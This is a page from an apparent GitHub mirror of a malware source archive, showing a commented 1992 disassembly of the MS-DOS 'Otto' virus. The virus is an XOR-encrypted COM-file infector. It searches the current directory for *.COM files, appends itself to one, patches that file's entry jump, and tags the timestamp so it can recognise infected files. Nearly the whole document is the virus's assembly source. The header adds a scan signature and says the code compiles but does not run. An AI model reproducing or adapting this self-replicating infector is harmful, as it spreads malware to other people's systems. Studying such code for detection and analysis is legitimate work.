ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
e2d9bb12d0
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.otto.asm
vxunderground f76af55eb4
Add files via upload
2021-01-12 17:52:14 -06:00

284 lines
7.4 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;******************************************************************************
; Otto Virus
;
; Disassembled by Data Disruptor
; (c) 1992 RABID International Development
; (May.12.92)
;
; Original virus written by YAM (Youth Against McAfee) 1992
;
; Notes: Otto Schtuck (Pardon the spelling?) claims that this is a super-
; encrypting virus. Well, it took me all of two minutes to get the virus
; into it's disassembled form. Try again guys. It wasn't half bad. For
; this virus, I could not use the techniques outlined in my article in
; Censor Volume 1~, therefore, I had to use another method (which,
; coincidentally is a lot better). Be expecting "Decrypting Viruses
; Part ][" in the next issue of Censor (Slated for release in early
; June).
;
; As always, these disassemblies compile but do not run. They are
; intended to be used for "Hmm. Let's see how that group program's"
; purposes only.
;
; Data Disruptor
; RABID
;
; ~ I don't know the reason why my method outlined in Censor I didn't work.
; It could have had something to do with SMARTDRV and FSP conflicting in
; memory. Nonetheless, another method was found.
;
; (Ok. So it's not one of my best disassemblies, but at least it shows how
; one can decrypt encrypted viruses...)
;
; A scan for this virus is;
;
; # Otto - Written by Otto Schtuck
; "8A 24 32 E0 88 24 46" Otto Schtuck [Otto] *NEW*
;
; It does no damage, does not hide it's file increase, but preserves the time
; & date stamp. It does not display any message. It is a transient COM infector
; that will infect one file in the current directory each time it is run.
;
;******************************************************************************
file_handle equ 9Eh ; File handle location
enc_bit equ 0FFh ; Encryption bit
code segment byte public
assume cs:code, ds:code
org 100h
;---
; Length of virus is 379 bytes...
;---
otto_vir proc far
start:
jmp short virus_entry ; Virus entry here
;---
; This hunk of shit here looks encrypted. I couldn't be bothered to go any
; further...
;---
crypt_1 db 90h
db 12h, 44h, 75h, 64h, 6Eh,0C1h
db 0Eh,0EDh, 70h, 05h, 34h, 5Dh
db 77h,0EBh, 35h,0D4h, 35h, 46h
db 34h, 68h, 7Ch,0A2h, 05h,0C1h
db 24h, 49h, 34h, 4Eh, 6Ch,0F1h
db 33h,0D5h, 20h, 5Ch, 7Bh, 78h
db 08h, 88h
crypt_2 db 69h
db 0C3h, 79h
db 08h, 25h, 33h, 3Ch
db 0B0h, 61h,0F2h, 11h, 6Ah, 5Dh
db 4Eh, 25h,0CBh, 2Fh,0D4h, 35h
db 5Ah, 7Ah, 6Bh, 71h,0EBh, 2Eh
db 0CEh, 31h, 44h, 19h, 00h, 1Fh
virus_entry:
cmp al,[bx+di-14h]
popf ; Pop flags
or ax,bp
add [bx+si],al
pop si
push si
sub si,108h
pop ax
sub ax,100h
mov ds:enc_bit,al
push si
mov cx,17Bh ; 379 bytes
add si,offset crypt_2
decrypt:
mov ah,[si]
xor ah,al
mov [si],ah
inc si
ror al,1 ; Rotate
loop decrypt
pop si
mov ax,enc_ax[si]
mov dh,enc_dh[si]
mov word ptr ds:[100h],ax
mov crypt_1,dh
lea dx,filespec ; Set filespec
xor cx,cx ; Search for normal files
mov ah,4Eh ; Search for first match
search_handler:
int 21h
jnc got_file
jmp quit
;---
; Otto! If you want to save some bytes, you don't have to open the file in
; order to get it's time. There are other ways around this...
;---
got_file:
mov dx,file_handle ; Get file handle from DTA
mov ax,3D02h ; Open file with read/write
int 21h
mov bx,ax ; Save file handle in BX
mov ax,5700h
int 21h ; Get time/date from file
cmp cl,3 ; Check timestamp
jne found_host ; Not equal to our timestamp?
mov ah,3Eh ; Then close the file and...
int 21h ;
mov ah,4Fh ; ...Search for next match
jmp short search_handler
found_host:
push cx
push dx
call move_ptr_start ; Move file pointer to start
lea dx,[si+three_bytes] ; Set buffer space for 3 bytes
mov cx,3 ; Set for 3 bytes
mov ah,3Fh ; Read in file
int 21h
xor cx,cx ; Set registers to...
xor dx,dx ; ...absolute end of file
mov ax,4202h
int 21h ; Move file point to end
mov word ptr ptr_loc[si],ax
sub ax,3
mov adj_ptr_loc[si],ax
call move_ptr_start
add ax,6
mov work[si],al
mov cx,word ptr ptr_loc[si]
;---
; Set buffer space at end of the file so that we don't waste space in the
; virus
;---
lea dx,[si+2A4h]
mov ah,3Fh ; Read in file
int 21h
push si
mov al,work[si]
add si,offset copyright+4
call encrypt
pop si
call move_ptr_start
mov cx,word ptr ptr_loc[si]
lea dx,[si+2A4h] ; Load effective addr
mov ah,40h ;
int 21h
jnc check_write ;
jmp short quit
check_write:
lea dx,[si+105h] ; Load effective addr
mov cx,24h
mov ah,40h ;
int 21h
push si
mov cx,17Bh ; 379 bytes
mov di,si
add di,offset copyright+1
add si,offset crypt_2
rep movsb ;
pop si
push si
mov al,work[si]
mov cx,17Bh ; 397 bytes
add si,offset copyright+1
call encrypt
pop si
mov cx,17Bh ; 397 bytes
lea dx,[si+2A4h] ; Set buffer to encrypted data
mov ah,40h ; Write out the virus to the
; file
int 21h
jc quit ; Jump if carry Set
call move_ptr_start ; Move file pointer to start
lea dx,[si+new_jump] ; Load DX with the new jump
mov ah,40h ;
mov cx,3 ; Set for 3 bytes
int 21h ; Write out the new jump
jc quit ; Jump if carry Set
pop dx
pop cx
mov cl,3 ; Set low order time with
; our identity byte
mov ax,5701h
int 21h ; Set file date/time
mov ah,3Eh ;
int 21h ; Close the file
;---
; Hmm. This routine looks a bit familiar... Maybe it was "borrowed" from the
; RAGE Virus we wrote...
;---
quit:
push si ; Save our SI
mov al,ds:enc_bit ; Load AL with value of the
; encryption bit
xor cx,cx ;
add cx,si ; Load CX with original 3 bytes
add cx,3 ; Adjust value for offset of
; virgin code
mov bp,103h ; Load BP with offset of 103h
; Where the virgin code starts
mov si,bp ; Copy this location to SI
call encrypt ; Encrypt this portion of the
; code
pop si ; Restore original SI
mov bp,offset start ; Load BP with offset of start
; of the virgin code
jmp bp ; Jump to start of virgin code
otto_vir endp
encrypt proc near
encryption:
mov ah,[si]
xor ah,al
mov [si],ah
inc si
ror al,1 ; Rotate
loop encryption
retn
encrypt endp
db 'OTTO VIRUS written by:OTTO '
enc_ax dw 4353h ; Encryption shit loaded in AX
enc_dh db 48h ; Encryption shit loaded in DH
db 54h
adj_ptr_loc dw 4355h ; Adjusted file pointer
; location (ptr_loc-3 bytes)
work db 4Bh ; A work buffer
ptr_loc db 20h ; File pointer location
copyright db 'COPYRIGHT MICROSHAFT INDUSTRIES '
db '1992 (tm.)PQR'
;---
; Everything below here appeared as a bunch of hex shit I had to convert...
;---
move_ptr_start proc near
mov ax,4200h ; Move fp to start (B80042)
xor cx,cx ; (33C9)
xor dx,dx ; (33D2)
int 21h ; Call DOS (CD21)
pop dx ; (5A)
pop cx ; (59)
pop ax ; (58)
ret ; (C3)
move_ptr_start endp
filespec db '*.COM',0 ; Location 295h
three_bytes db 0ebh,46h,90h ; jmp 148 (Location 29Bh)
new_jump db 0e9h,4ah,00h ; jmp 150 (Loc 29Eh)
push ax ; Loc 2A1h
dec bp ; Loc 2A2h
db 00h ; Loc 2A3h
code ends
end start

Reference in New Issue View Git Blame Copy Permalink